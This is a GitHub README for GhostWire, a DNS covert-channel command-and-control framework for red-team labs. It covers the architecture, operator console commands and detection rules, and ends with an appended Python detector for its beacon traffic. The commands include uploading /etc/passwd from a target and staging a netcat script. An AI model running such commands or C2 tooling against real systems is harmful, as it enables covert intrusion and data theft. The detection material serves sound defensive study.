Nis3phraim/GhostWire
GitHub: Nis3phraim/GhostWire
GhostWire is a lightweight C2 framework built on a DNS covert channel, helping red teams and defenders study encrypted C2 communication and detection techniques in controlled environments.
Stars: 0 | Forks: 0
# GhostWire C2 Framework
GhostWire is a lightweight, modular C2 framework designed for **controlled cybersecurity research, red team labs and portfolio demonstrations**. It demonstrates real-world adversary techniques over a DNS covert channel, with strong encryption, session management and file transfer.
**Intended audience:** red team operators, threat hunters and SOC analysts studying DNS tunneling and encrypted C2 traffic.
## Demo
### GhostWire Operator Console
## Skills Demonstrated
- Python development
- Network programming
- DNS protocol analysis
- Cryptography concepts
- Detection engineering
- Security automation
- Threat emulation
- MITRE ATT&CK mapping
- SQLite persistence
## Architecture
```
┌─────────────┐      DNS TXT/UDP       ┌──────────────────┐
│   Implant   │ ◄────────────────────► │   DNS Listener   │
│   (Agent)   │   AES-256-CTR + RSA    │   (C2 Server)    │
└─────────────┘                        └──────────────────┘
       ↑                                        ↑
  [Target Lab]                         [Operator Console]
```
- **Transport:** DNS TXT queries (stealthy, blends in with normal traffic)
- **Encryption:** RSA-2048 key exchange → AES-256-CTR session traffic
- **Routing:** DGA (domain generation algorithm) with backup domains
- **Database:** SQLite persistence for sessions/commands/results
- **Logging:** file-based audit log of all C2 events
## Features
| Feature | Status | MITRE ATT&CK |
|---------|--------|--------------|
| Encrypted DNS C2 | ✅ | [T1071.004](docs/MITRE.md) |
| AES-256 session encryption | ✅ | [T1573.001](docs/MITRE.md) |
| File upload (exfiltration) | ✅ | [T1041](docs/MITRE.md) |
| File download (tool delivery) | ✅ | [T1105](docs/MITRE.md) |
| DGA failover domains | ✅ | [T1568.001](docs/MITRE.md) |
| Command history and logging | ✅ | — |
| SQLite persistence | ✅ | — |
## Quick Start
```
# Set up the environment (install dependencies, create directories, generate keys)
./setup.sh
# Start the C2 server
python server/ghostwire.py
# In another terminal, run the implant (lab target)
python agent/implant.py
```
Operator console commands:
```
GhostWire> sessions
GhostWire> cmd whoami
GhostWire> upload /etc/passwd
GhostWire> download ./tools/netcat.sh /tmp/nc.sh
GhostWire> history
```
## Blue Team / Detection Guide
This section demonstrates the defensive counterpart to GhostWire's offensive capabilities.
### Network Indicators
- DNS queries to DGA-looking subdomains on port 5354 (or the configured port)
- High-frequency TXT lookups with base64-like labels
- Query pattern: .....
### Detection Rules
#### Suricata / Zeek Notice
```
# Detect high-volume DNS TXT queries toward the C2 domain
alert dns any any -> any 5354 (msg:"GHOSTWIRE Possible DNS C2 Beacon"; dns.query; pcre:"/^[a-f0-9]{8}\.(bcon|cmd|data|reg)\.[0-9]+\./"; sid:1000001; rev:1;)
```
#### Sigma Rule
```
title: GhostWire DNS C2 Detection
logsource:
  category: dns
detection:
  selection:
    record_type: TXT
    query|re: '^[a-f0-9]{8}\.(bcon|cmd|data|reg|upld|dnld)\.[0-9]+\.'
  condition: selection
falsepositives:
  - Unknown
level: high
```
### Host Artifacts
- `logs/ghostwire.log` on the compromised machine (if not cleaned)
- A Python process making DNS queries every 60s ± jitter
### Defensive Recommendations
- Monitor for TXT query anomalies — most benign DNS uses A/AAAA/CNAME, not frequent TXT.
- Track DGA patterns — high-entropy subdomains with low TTL.
- Correlate beaconing intervals — regular 60s intervals with jitter are characteristic of C2.
- Use DNS sinkholes for the observed backup domains.
## Project Structure
```
GhostWire/
├── agent/implant.py        # Target-side implant
├── server/
│   ├── ghostwire.py        # Operator console
│   └── dns_listener.py     # DNS C2 engine
├── shared/
│   ├── crypto.py           # AES + RSA implementation
│   ├── protocol.py         # Message format constants
│   ├── dga.py              # Domain Generation Algorithm
│   ├── config.py           # Central configuration
│   ├── database.py         # SQLite persistence
│   └── logger.py           # File audit logging
├── docs/MITRE.md           # ATT&CK mapping
├── generate_keys.py        # RSA key generator
├── setup.sh                # One-command lab setup
├── requirements.txt
└── README.md
```
## Ethical Use & Disclaimer
GhostWire is built for authorized cybersecurity education, red team labs, and portfolio demonstration. It is intended to be used only in environments you own or have explicit written permission to test.
By using this software, you agree to follow responsible disclosure practices and comply with all applicable laws.
## Tech Stack
- Language: Python 3
- Crypto: cryptography (AES-256-CTR, RSA-2048-OAEP)
- DNS: dnslib + dnspython
- DB: SQLite3
- UI: Terminal Operator Console
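As an added example, not code from the GhostWire project or its README, the Python below applies the Sigma rule's logic from the Detection Rules section and the behavioural checks from the Defensive Recommendations (TXT-to-total query ratio, first-label entropy, beacon regularity) to a constructed Zeek-style `dns.log` sample. The log lines, the `lab-c2-example.test` domain and the `10.0.0.x` addresses are constructed for the demonstration; the thresholds (`period=60`, `tolerance=15`, `max_cv=0.25`, `min_txt=3`) are assumptions picked to fit the README's "60s ± jitter" description. It uses the Sigma regex rather than the Suricata one because the Sigma pattern is a superset (it also matches the `upld`/`dnld` labels).

```python
import math
import re
import statistics
from collections import defaultdict

# Signature taken from the README's Sigma rule: an 8-char hex session id,
# a message-type label, a numeric sequence label, then the rest of the domain.
GHOSTWIRE_LABEL_RE = re.compile(r"^[a-f0-9]{8}\.(bcon|cmd|data|reg|upld|dnld)\.[0-9]+\.")

# Constructed sample in a Zeek dns.log-like TSV layout (ts, src ip, query, qtype).
# The domain and addresses are placeholders, not real traffic. 10.0.0.5 beacons
# roughly every 60s; 10.0.0.7 only does ordinary lookups (including a benign TXT).
SAMPLE_DNS_LOG = """\
1700000000.000\t10.0.0.5\t3fa9c1d2.bcon.1.lab-c2-example.test\tTXT
1700000005.000\t10.0.0.5\twww.example.com\tA
1700000061.400\t10.0.0.5\t3fa9c1d2.bcon.2.lab-c2-example.test\tTXT
1700000118.900\t10.0.0.5\t3fa9c1d2.bcon.3.lab-c2-example.test\tTXT
1700000120.000\t10.0.0.7\tmail.example.com\tMX
1700000182.300\t10.0.0.5\t3fa9c1d2.cmd.4.lab-c2-example.test\tTXT
1700000183.100\t10.0.0.7\t_dmarc.example.com\tTXT
1700000240.700\t10.0.0.5\t3fa9c1d2.data.5.lab-c2-example.test\tTXT
"""


def parse_dns_log(text):
    """Parse the TSV sample into dicts; blank and '#' comment lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, query, qtype = line.split("\t")
        rows.append({"ts": float(ts), "src": src, "query": query, "qtype": qtype})
    return rows


def matches_signature(query, qtype):
    """The Sigma rule's logic: record type TXT AND the label regex."""
    return qtype == "TXT" and GHOSTWIRE_LABEL_RE.match(query) is not None


def shannon_entropy(label):
    """Bits of entropy per character of one DNS label (high for hex/base64/DGA labels)."""
    if not label:
        return 0.0
    n = len(label)
    counts = {c: label.count(c) for c in set(label)}
    return -sum((k / n) * math.log2(k / n) for k in counts.values())


def beacon_interval_stats(timestamps):
    """Mean and coefficient of variation of the gaps between consecutive queries.
    A low CV around a fixed period (here ~60s) is the beaconing tell."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None, None
    mean = statistics.mean(gaps)
    cv = statistics.stdev(gaps) / mean if mean else float("inf")
    return mean, cv


def analyze(text, period=60.0, tolerance=15.0, max_cv=0.25, min_txt=3):
    """Per-source summary: signature hits plus the behavioural checks the README
    recommends (TXT ratio, first-label entropy, periodic TXT queries)."""
    by_src = defaultdict(list)
    for row in parse_dns_log(text):
        by_src[row["src"]].append(row)

    report = {}
    for src, rows in by_src.items():
        txt_rows = [r for r in rows if r["qtype"] == "TXT"]
        hits = sum(matches_signature(r["query"], r["qtype"]) for r in rows)
        txt_ratio = len(txt_rows) / len(rows)
        entropies = [shannon_entropy(r["query"].split(".")[0]) for r in txt_rows]
        mean_gap, cv = beacon_interval_stats([r["ts"] for r in txt_rows])
        periodic = (
            len(txt_rows) >= min_txt
            and mean_gap is not None
            and abs(mean_gap - period) <= tolerance
            and cv <= max_cv
        )
        report[src] = {
            "signature_hits": hits,
            "txt_ratio": round(txt_ratio, 2),
            "max_label_entropy": round(max(entropies), 2) if entropies else 0.0,
            "mean_txt_interval": round(mean_gap, 1) if mean_gap is not None else None,
            "periodic_txt": periodic,
            # Signature match alone is enough; otherwise require the behavioural combo.
            "flagged": hits > 0 or (periodic and txt_ratio > 0.5),
        }
    return report


if __name__ == "__main__":
    for src, summary in analyze(SAMPLE_DNS_LOG).items():
        print(src, summary)
```

On the constructed sample, `10.0.0.5` is flagged both by the signature (five hits) and by behaviour (mean TXT interval about 60s with a CV near 0.05, all first labels at 3.0 bits of entropy), while `10.0.0.7` is left alone even though it issues a TXT lookup, because `_dmarc` does not match the pattern and there is no periodicity. The regex is the cheap, precise check; the behavioural path is what keeps the detection useful if the label scheme in a variant differs from what the rules encode, so the two are combined rather than relied on separately. A real Zeek `dns.log` has more columns than this sample, so the parser's column split is the first thing to adapt.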
Tags: C2 framework, DNS covert channel, bulk IP address processing, Python, security learning resources, no backdoor, cybersecurity, privacy protection